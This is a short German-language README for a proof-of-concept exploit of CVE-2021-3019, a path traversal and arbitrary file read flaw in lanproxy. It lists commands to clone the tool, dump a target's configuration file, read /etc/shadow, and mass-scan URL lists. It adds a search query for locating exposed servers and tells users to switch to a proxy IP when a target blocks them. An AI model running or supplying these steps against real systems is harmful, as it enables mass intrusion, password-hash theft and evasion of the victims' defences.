
CVE-2021-3019 lanproxy Verzeichnisdurchquerung beliebiger Datei-Lese-Schwachstellen-POC
CVE-2021-3019 lanproxy Verzeichnisdurchquerung und beliebiges Dateilesen

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
Standardmäßig ohne Parameter ausführen zeigt Hilfsinformationen an.

Führt Schwachstellenprüfung für eine einzelne URL durch. Wenn eine Schwachstelle existiert, wird standardmäßig die Konfigurationsdatei gelesen und ausgegeben.
python3 POC.py -u http://127.0.0.1:9100

Verwenden Sie den Parameter -r, um andere Dateien des Systems zu lesen. Der absolute Pfad der Datei muss bekannt sein.
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

Verwenden Sie den Parameter -f für Massenerkennung. Schwachstellen werden in die Datei success.txt geschrieben.
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="登录"
Wenn Connection reset by peer angezeigt wird, ist es sehr wahrscheinlich, dass die IP vom Zielserver blockiert wurde. Wechseln Sie einfach zu einer Proxy-IP.